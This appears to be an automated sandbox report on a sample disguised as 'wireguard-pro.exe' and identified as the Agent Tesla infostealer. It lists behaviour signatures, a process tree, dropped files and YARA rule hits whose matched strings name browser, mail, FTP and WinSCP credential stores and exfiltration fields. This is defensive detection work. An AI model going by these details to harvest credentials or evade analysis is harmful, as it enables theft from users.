Edit tour

Windows Analysis Report
wireguard-pro.exe

Overview

General Information

Sample Name:	wireguard-pro.exe
Analysis ID:	1319033
MD5:	c3fdabfa7e016aa9b2cacbb5fc9860a8
SHA1:	70e5f0dfb1a1dc4d6668f6333ecbf83aa49d13bf
SHA256:	313897bcfd2d0d82e6f41eef6161976f84c602ebed626ee29feaec6ee36f2c94
Tags:	agentteslaexe
Infos:

Detection

Agent Tesla, AgentTesla

Score:	90
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected AgentTesla

Yara detected AntiVM3

Detected Agent Tesla keylogger

Antivirus detection for dropped file

Yara detected UAC Bypass using CMSTP

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for dropped file

Tries to steal Mail credentials (via file / registry access)

Machine Learning detection for sample

May check the online IP address of the machine

.NET source code contains potential unpacker

Hides that the sample has been downloaded from the Internet (zone.identifier)

Tries to harvest and steal browser information (history, passwords, etc)

Installs a global keyboard hook

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Contains functionality to capture screen (.Net source)

Tries to harvest and steal ftp login credentials

Drops executable to a common third party application directory

Yara detected Generic Downloader

.NET source code contains very large strings

Machine Learning detection for dropped file

Tries to steal Instant Messenger accounts or passwords

Drops certificate files (DER)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Stores files to the Windows start menu directory

JA3 SSL client fingerprint seen in connection with other malware

HTTP GET or POST without a user agent

Uses insecure TLS / SSL version for HTTPS connection

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Adds / modifies Windows certificates

Drops PE files

Tries to load missing DLLs

Uses a known web browser user agent for HTTP communication

Drops PE files to the windows directory (C:\Windows)

Binary contains a suspicious time stamp

Launches processes in debugging mode, may be used to hinder debugging

Checks for available system drives (often done to infect USB drives)

Dropped file seen in connection with other malware

Creates a process in suspended mode (likely to inject code)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Deletes files inside the Windows folder

Creates files inside the system directory

PE file contains sections with non-standard names

Yara detected Credential Stealer

Found dropped PE file which has not been started or loaded

PE file contains executable resources (Code or Archives)

IP address seen in connection with other malware

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

AV process strings found (often used to terminate AV products)

Installs a raw input device (often for capturing keystrokes)

Sample file is different than original file name gathered from version info

Creates a window with clipboard capturing capabilities

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Classification

Process Tree

System is w10x64

wireguard-pro.exe (PID: 7080 cmdline: C:\Users\user\Desktop\wireguard-pro.exe MD5: C3FDABFA7E016AA9B2CACBB5FC9860A8)

conhost.exe (PID: 7104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

7ABGVF6Q.exe (PID: 5164 cmdline: "C:\Users\user\AppData\Local\Temp\Low\7ABGVF6Q.exe" MD5: 1CF9257C07936D7FBF508DC113E9B6D5)

HQL82NEF.exe (PID: 5160 cmdline: "C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe" MD5: 64A509A5D856C0E1BC482E64E5EA8556)

msiexec.exe (PID: 632 cmdline: C:\Windows\system32\msiexec.exe /V MD5: 4767B71A318E201188A0D0A420C8B608)

msiexec.exe (PID: 6628 cmdline: C:\Windows\System32\MsiExec.exe -Embedding 5AD05C264D17A520CC3AF28B9CDE51EF MD5: 4767B71A318E201188A0D0A420C8B608)

msiexec.exe (PID: 6572 cmdline: C:\Windows\System32\MsiExec.exe -Embedding CC7CB015DD9FB5BB407A6980FAC33728 E Global\MSI0000 MD5: 4767B71A318E201188A0D0A420C8B608)

wireguard.exe (PID: 6736 cmdline: C:\Program Files\WireGuard\wireguard.exe MD5: 18D5B6964A434AF936E1DB19D969DBBB)

wireguard.exe (PID: 2200 cmdline: "C:\Program Files\WireGuard\wireguard.exe" /installmanagerservice MD5: 18D5B6964A434AF936E1DB19D969DBBB)

wireguard.exe (PID: 3068 cmdline: "C:\Program Files\WireGuard\wireguard.exe" /managerservice MD5: 18D5B6964A434AF936E1DB19D969DBBB)

wireguard.exe (PID: 7076 cmdline: "C:\Program Files\WireGuard\wireguard.exe" /ui 888 884 896 904 MD5: 18D5B6964A434AF936E1DB19D969DBBB)

audddd.exe (PID: 7708 cmdline: "C:\Users\user\AppData\Roaming\audddd\audddd.exe" MD5: 64A509A5D856C0E1BC482E64E5EA8556)

audddd.exe (PID: 7812 cmdline: "C:\Users\user\AppData\Roaming\audddd\audddd.exe" MD5: 64A509A5D856C0E1BC482E64E5EA8556)

svchost.exe (PID: 8180 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6832 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 7560 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://www.secureworks.com/research/threat-profiles/gold-galleon https://asec.ahnlab.com/ko/29133/ https://blog.apnic.net/2022/03/31/how-to-detect-and-prevent-common-data-exfiltration-attacks/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Roaming\audddd\audddd.exe	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
C:\Users\user\AppData\Roaming\audddd\audddd.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Users\user\AppData\Roaming\audddd\audddd.exe	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
C:\Users\user\AppData\Roaming\audddd\audddd.exe	AgentTesla_1	AgentTesla Payload	kevoreilly	0x2577c:$string1: smtp 0x26ebc:$string1: smtp 0x24d66:$string2: appdata 0x24e5a:$string3: 76487-337-8429955-22614 0x24da6:$string4: yyyy-MM-dd HH:mm:ss 0x24d48:$string6: webpanel 0x25925:$string7: <br>UserName      : 0x25ed9:$string8: <br>IP Address  :
C:\Users\user\AppData\Roaming\audddd\audddd.exe	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x29923:$f1: FileZilla\recentservers.xml 0x29a2f:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0x28de7:$b1: Chrome\User Data\ 0x18130:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x1840c:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x28e5f:$b4: Opera Software\Opera Stable\Login Data 0x28ec7:$b5: YandexBrowser\User Data\ 0x1bbd8:$s4: logins.json 0x28f3b:$s4: logins.json 0x2a4c1:$s5: Account.CFN 0x2abf9:$s6: wand.dat 0x28d9b:$a1: username_value 0x28db9:$a2: password_value 0x1bc2c:$a3: encryptedUsername 0x28f8f:$a3: encryptedUsername 0x29609:$a3: encryptedUsername 0x1bc08:$a4: encryptedPassword 0x28f6b:$a4: encryptedPassword 0x2962d:$a4: encryptedPassword
C:\Users\user\AppData\Roaming\audddd\audddd.exe	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x22bb8:$s1: get_kbHook 0x23ef1:$s2: GetPrivateProfileString 0x21df4:$s3: get_OSFullName 0x22e6c:$s4: get_PasswordHash 0x225db:$s6: FtpWebRequest 0x1bbd8:$s7: logins 0x28e51:$s7: logins 0x28f3b:$s7: logins 0x293e9:$s7: logins 0x295e9:$s7: logins 0x2c6bf:$s7: logins 0x25e5b:$s8: keylog
C:\Users\user\AppData\Roaming\audddd\audddd.exe	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x1bbd8:$s10: logins 0x28e51:$s10: logins 0x28f3b:$s10: logins 0x293e9:$s10: logins 0x295e9:$s10: logins 0x2c6bf:$s10: logins 0x22b89:$g1: get_Clipboard 0x22d30:$g2: get_Keyboard 0x17544:$g3: get_Password 0x1afc5:$g3: get_Password 0x22e7d:$g3: get_Password 0x22d55:$g4: get_CtrlKeyDown 0x22d77:$g5: get_ShiftKeyDown 0x22d46:$g6: get_AltKeyDown
C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	AgentTesla_1	AgentTesla Payload	kevoreilly	0x2577c:$string1: smtp 0x26ebc:$string1: smtp 0x24d66:$string2: appdata 0x24e5a:$string3: 76487-337-8429955-22614 0x24da6:$string4: yyyy-MM-dd HH:mm:ss 0x24d48:$string6: webpanel 0x25925:$string7: <br>UserName      : 0x25ed9:$string8: <br>IP Address  :
C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x29923:$f1: FileZilla\recentservers.xml 0x29a2f:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0x28de7:$b1: Chrome\User Data\ 0x18130:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x1840c:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x28e5f:$b4: Opera Software\Opera Stable\Login Data 0x28ec7:$b5: YandexBrowser\User Data\ 0x1bbd8:$s4: logins.json 0x28f3b:$s4: logins.json 0x2a4c1:$s5: Account.CFN 0x2abf9:$s6: wand.dat 0x28d9b:$a1: username_value 0x28db9:$a2: password_value 0x1bc2c:$a3: encryptedUsername 0x28f8f:$a3: encryptedUsername 0x29609:$a3: encryptedUsername 0x1bc08:$a4: encryptedPassword 0x28f6b:$a4: encryptedPassword 0x2962d:$a4: encryptedPassword
C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x22bb8:$s1: get_kbHook 0x23ef1:$s2: GetPrivateProfileString 0x21df4:$s3: get_OSFullName 0x22e6c:$s4: get_PasswordHash 0x225db:$s6: FtpWebRequest 0x1bbd8:$s7: logins 0x28e51:$s7: logins 0x28f3b:$s7: logins 0x293e9:$s7: logins 0x295e9:$s7: logins 0x2c6bf:$s7: logins 0x25e5b:$s8: keylog
C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x1bbd8:$s10: logins 0x28e51:$s10: logins 0x28f3b:$s10: logins 0x293e9:$s10: logins 0x295e9:$s10: logins 0x2c6bf:$s10: logins 0x22b89:$g1: get_Clipboard 0x22d30:$g2: get_Keyboard 0x17544:$g3: get_Password 0x1afc5:$g3: get_Password 0x22e7d:$g3: get_Password 0x22d55:$g4: get_CtrlKeyDown 0x22d77:$g5: get_ShiftKeyDown 0x22d46:$g6: get_AltKeyDown
C:\Program Files\WireGuard\wireguard.exe	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
C:\Program Files\WireGuard\wireguard.exe	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x339057:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x33db63:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x3e5f06:$s1: CoGetObject
Click to see the 11 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.1130370284.0000000002FE7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000000.636854021.0000000000AD0000.00000002.00000001.01000000.0000000B.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000000.00000002.619000321.0000000012C8A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.619000321.0000000012C8A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000009.00000000.637554175.0000000000AD0000.00000002.00000001.01000000.0000000B.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000007.00000002.637369671.0000000000AD0000.00000002.00000001.01000000.0000000B.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000003.00000000.614084883.0000000000B22000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000000.614084883.0000000000B22000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000007.00000000.635889564.0000000000AD0000.00000002.00000001.01000000.0000000B.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000A.00000000.638265825.0000000000AD0000.00000002.00000001.01000000.0000000B.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000012.00000002.1130043330.00000000030AA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.1129407709.0000000000AD0000.00000002.00000001.01000000.0000000B.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000009.00000002.1129430829.0000000000AD0000.00000002.00000001.01000000.0000000B.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000008.00000002.639295558.0000000000AD0000.00000002.00000001.01000000.0000000B.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: wireguard-pro.exe PID: 7080	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: wireguard-pro.exe PID: 7080	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: wireguard-pro.exe PID: 7080	JoeSecurity_Agenttesla_Smtp_Variant	Yara detected AgentTesla	Joe Security
Process Memory Space: wireguard-pro.exe PID: 7080	agenttesla_smtp_variant	unknown	j from thl <j@techhelplist.com> with thx to @fumik0_ !!1!	0x6e4a5:$a: type={ 0x6eb5f:$a: type={ 0x6e4af:$b: hwid={ 0x6e4b9:$c: time={ 0x6e4c3:$d: pcname={ 0x6e4cf:$e: logdata={ 0x6e4dc:$f: screen={ 0x6e4e8:$g: ipadd={ 0x6e4f3:$h: webcam_link={ 0x6e538:$i: screen_link={ 0x6eb70:$i: screen_link={ 0x6e54a:$j: site_username={ 0x6eb81:$j: site_username={ 0x6eb94:$k: [passwords]
Process Memory Space: HQL82NEF.exe PID: 5160	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: HQL82NEF.exe PID: 5160	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: HQL82NEF.exe PID: 5160	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: HQL82NEF.exe PID: 5160	JoeSecurity_Agenttesla_Smtp_Variant	Yara detected AgentTesla	Joe Security
Process Memory Space: HQL82NEF.exe PID: 5160	agenttesla_smtp_variant	unknown	j from thl <j@techhelplist.com> with thx to @fumik0_ !!1!	0x515e5:$a: type={ 0x28060e:$a: type={ 0x28d604:$a: type={ 0x28dcbe:$a: type={ 0x515ef:$b: hwid={ 0x280618:$b: hwid={ 0x28d60e:$b: hwid={ 0x515f9:$c: time={ 0x280622:$c: time={ 0x28d618:$c: time={ 0x51603:$d: pcname={ 0x28062c:$d: pcname={ 0x28d622:$d: pcname={ 0x5160f:$e: logdata={ 0x280638:$e: logdata={ 0x28d62e:$e: logdata={ 0x5161c:$f: screen={ 0x280645:$f: screen={ 0x28d63b:$f: screen={ 0x51628:$g: ipadd={ 0x280651:$g: ipadd={
Process Memory Space: wireguard.exe PID: 6736	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: wireguard.exe PID: 2200	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: wireguard.exe PID: 3068	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: wireguard.exe PID: 7076	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: audddd.exe PID: 7812	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: audddd.exe PID: 7812	JoeSecurity_Agenttesla_Smtp_Variant	Yara detected AgentTesla	Joe Security
Process Memory Space: audddd.exe PID: 7812	agenttesla_smtp_variant	unknown	j from thl <j@techhelplist.com> with thx to @fumik0_ !!1!	0x292dae:$a: type={ 0x2c4a1a:$a: type={ 0x292db8:$b: hwid={ 0x2c4a24:$b: hwid={ 0x292dc2:$c: time={ 0x2c4a2e:$c: time={ 0x292dcc:$d: pcname={ 0x2c4a38:$d: pcname={ 0x292dd8:$e: logdata={ 0x2c4a44:$e: logdata={ 0x292de5:$f: screen={ 0x2c4a51:$f: screen={ 0x292df1:$g: ipadd={ 0x2c4a5d:$g: ipadd={ 0x292dfc:$h: webcam_link={ 0x2c4a68:$h: webcam_link={ 0x292e41:$i: screen_link={ 0x2c4a79:$i: screen_link={ 0x292e53:$j: site_username={ 0x2c4a8a:$j: site_username={ 0x2c4a9d:$k: [passwords]
Click to see the 25 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.wireguard-pro.exe.12d6ba54.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.wireguard-pro.exe.12d6ba54.3.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.wireguard-pro.exe.12d6ba54.3.raw.unpack	AgentTesla_1	AgentTesla Payload	kevoreilly	0xc618:$string1: smtp 0xdd58:$string1: smtp 0xbc02:$string2: appdata 0xbcf6:$string3: 76487-337-8429955-22614 0xbc42:$string4: yyyy-MM-dd HH:mm:ss 0xbbe4:$string6: webpanel 0xc7c1:$string7: <br>UserName      : 0xcd75:$string8: <br>IP Address  :
0.2.wireguard-pro.exe.12d6ba54.3.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x107bf:$f1: FileZilla\recentservers.xml 0x108cb:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0xfc83:$b1: Chrome\User Data\ 0xfcfb:$b4: Opera Software\Opera Stable\Login Data 0xfd63:$b5: YandexBrowser\User Data\ 0x2a74:$s4: logins.json 0xfdd7:$s4: logins.json 0x1135d:$s5: Account.CFN 0x11a95:$s6: wand.dat 0xfc37:$a1: username_value 0xfc55:$a2: password_value 0x2ac8:$a3: encryptedUsername 0xfe2b:$a3: encryptedUsername 0x104a5:$a3: encryptedUsername 0x2aa4:$a4: encryptedPassword 0xfe07:$a4: encryptedPassword 0x104c9:$a4: encryptedPassword
0.2.wireguard-pro.exe.12d6ba54.3.raw.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x9a54:$s1: get_kbHook 0xad8d:$s2: GetPrivateProfileString 0x8c90:$s3: get_OSFullName 0x9d08:$s4: get_PasswordHash 0x9477:$s6: FtpWebRequest 0x2a74:$s7: logins 0xfced:$s7: logins 0xfdd7:$s7: logins 0x10285:$s7: logins 0x10485:$s7: logins 0x1355b:$s7: logins 0xccf7:$s8: keylog
0.2.wireguard-pro.exe.12d6ba54.3.raw.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x2a74:$s10: logins 0xfced:$s10: logins 0xfdd7:$s10: logins 0x10285:$s10: logins 0x10485:$s10: logins 0x1355b:$s10: logins 0x9a25:$g1: get_Clipboard 0x9bcc:$g2: get_Keyboard 0x1e61:$g3: get_Password 0x9d19:$g3: get_Password 0x9bf1:$g4: get_CtrlKeyDown 0x9c13:$g5: get_ShiftKeyDown 0x9be2:$g6: get_AltKeyDown
0.2.wireguard-pro.exe.12d67778.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.wireguard-pro.exe.12d67778.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.wireguard-pro.exe.12d67778.1.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.wireguard-pro.exe.12d67778.1.raw.unpack	AgentTesla_1	AgentTesla Payload	kevoreilly	0x108f4:$string1: smtp 0x12034:$string1: smtp 0xfede:$string2: appdata 0xffd2:$string3: 76487-337-8429955-22614 0xff1e:$string4: yyyy-MM-dd HH:mm:ss 0xfec0:$string6: webpanel 0x10a9d:$string7: <br>UserName      : 0x11051:$string8: <br>IP Address  :
0.2.wireguard-pro.exe.12d67778.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x14a9b:$f1: FileZilla\recentservers.xml 0x14ba7:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0x13f5f:$b1: Chrome\User Data\ 0x32a8:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x3584:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x13fd7:$b4: Opera Software\Opera Stable\Login Data 0x1403f:$b5: YandexBrowser\User Data\ 0x6d50:$s4: logins.json 0x140b3:$s4: logins.json 0x15639:$s5: Account.CFN 0x15d71:$s6: wand.dat 0x13f13:$a1: username_value 0x13f31:$a2: password_value 0x6da4:$a3: encryptedUsername 0x14107:$a3: encryptedUsername 0x14781:$a3: encryptedUsername 0x6d80:$a4: encryptedPassword 0x140e3:$a4: encryptedPassword 0x147a5:$a4: encryptedPassword
0.2.wireguard-pro.exe.12d67778.1.raw.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0xdd30:$s1: get_kbHook 0xf069:$s2: GetPrivateProfileString 0xcf6c:$s3: get_OSFullName 0xdfe4:$s4: get_PasswordHash 0xd753:$s6: FtpWebRequest 0x6d50:$s7: logins 0x13fc9:$s7: logins 0x140b3:$s7: logins 0x14561:$s7: logins 0x14761:$s7: logins 0x17837:$s7: logins 0x10fd3:$s8: keylog
0.2.wireguard-pro.exe.12d67778.1.raw.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x6d50:$s10: logins 0x13fc9:$s10: logins 0x140b3:$s10: logins 0x14561:$s10: logins 0x14761:$s10: logins 0x17837:$s10: logins 0xdd01:$g1: get_Clipboard 0xdea8:$g2: get_Keyboard 0x26bc:$g3: get_Password 0x613d:$g3: get_Password 0xdff5:$g3: get_Password 0xdecd:$g4: get_CtrlKeyDown 0xdeef:$g5: get_ShiftKeyDown 0xdebe:$g6: get_AltKeyDown
3.0.HQL82NEF.exe.b20000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.0.HQL82NEF.exe.b20000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
3.0.HQL82NEF.exe.b20000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
3.0.HQL82NEF.exe.b20000.0.unpack	AgentTesla_1	AgentTesla Payload	kevoreilly	0x2577c:$string1: smtp 0x26ebc:$string1: smtp 0x24d66:$string2: appdata 0x24e5a:$string3: 76487-337-8429955-22614 0x24da6:$string4: yyyy-MM-dd HH:mm:ss 0x24d48:$string6: webpanel 0x25925:$string7: <br>UserName      : 0x25ed9:$string8: <br>IP Address  :
3.0.HQL82NEF.exe.b20000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x29923:$f1: FileZilla\recentservers.xml 0x29a2f:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0x28de7:$b1: Chrome\User Data\ 0x18130:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x1840c:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x28e5f:$b4: Opera Software\Opera Stable\Login Data 0x28ec7:$b5: YandexBrowser\User Data\ 0x1bbd8:$s4: logins.json 0x28f3b:$s4: logins.json 0x2a4c1:$s5: Account.CFN 0x2abf9:$s6: wand.dat 0x28d9b:$a1: username_value 0x28db9:$a2: password_value 0x1bc2c:$a3: encryptedUsername 0x28f8f:$a3: encryptedUsername 0x29609:$a3: encryptedUsername 0x1bc08:$a4: encryptedPassword 0x28f6b:$a4: encryptedPassword 0x2962d:$a4: encryptedPassword
3.0.HQL82NEF.exe.b20000.0.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x22bb8:$s1: get_kbHook 0x23ef1:$s2: GetPrivateProfileString 0x21df4:$s3: get_OSFullName 0x22e6c:$s4: get_PasswordHash 0x225db:$s6: FtpWebRequest 0x1bbd8:$s7: logins 0x28e51:$s7: logins 0x28f3b:$s7: logins 0x293e9:$s7: logins 0x295e9:$s7: logins 0x2c6bf:$s7: logins 0x25e5b:$s8: keylog
3.0.HQL82NEF.exe.b20000.0.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x1bbd8:$s10: logins 0x28e51:$s10: logins 0x28f3b:$s10: logins 0x293e9:$s10: logins 0x295e9:$s10: logins 0x2c6bf:$s10: logins 0x22b89:$g1: get_Clipboard 0x22d30:$g2: get_Keyboard 0x17544:$g3: get_Password 0x1afc5:$g3: get_Password 0x22e7d:$g3: get_Password 0x22d55:$g4: get_CtrlKeyDown 0x22d77:$g5: get_ShiftKeyDown 0x22d46:$g6: get_AltKeyDown
0.2.wireguard-pro.exe.12d528f0.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.wireguard-pro.exe.12d528f0.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.wireguard-pro.exe.12d528f0.2.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.wireguard-pro.exe.12d528f0.2.raw.unpack	AgentTesla_1	AgentTesla Payload	kevoreilly	0x2577c:$string1: smtp 0x26ebc:$string1: smtp 0x24d66:$string2: appdata 0x24e5a:$string3: 76487-337-8429955-22614 0x24da6:$string4: yyyy-MM-dd HH:mm:ss 0x24d48:$string6: webpanel 0x25925:$string7: <br>UserName      : 0x25ed9:$string8: <br>IP Address  :
0.2.wireguard-pro.exe.12d528f0.2.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x29923:$f1: FileZilla\recentservers.xml 0x29a2f:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0x28de7:$b1: Chrome\User Data\ 0x18130:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x1840c:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x28e5f:$b4: Opera Software\Opera Stable\Login Data 0x28ec7:$b5: YandexBrowser\User Data\ 0x1bbd8:$s4: logins.json 0x28f3b:$s4: logins.json 0x2a4c1:$s5: Account.CFN 0x2abf9:$s6: wand.dat 0x28d9b:$a1: username_value 0x28db9:$a2: password_value 0x1bc2c:$a3: encryptedUsername 0x28f8f:$a3: encryptedUsername 0x29609:$a3: encryptedUsername 0x1bc08:$a4: encryptedPassword 0x28f6b:$a4: encryptedPassword 0x2962d:$a4: encryptedPassword
0.2.wireguard-pro.exe.12d528f0.2.raw.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x22bb8:$s1: get_kbHook 0x23ef1:$s2: GetPrivateProfileString 0x21df4:$s3: get_OSFullName 0x22e6c:$s4: get_PasswordHash 0x225db:$s6: FtpWebRequest 0x1bbd8:$s7: logins 0x28e51:$s7: logins 0x28f3b:$s7: logins 0x293e9:$s7: logins 0x295e9:$s7: logins 0x2c6bf:$s7: logins 0x25e5b:$s8: keylog
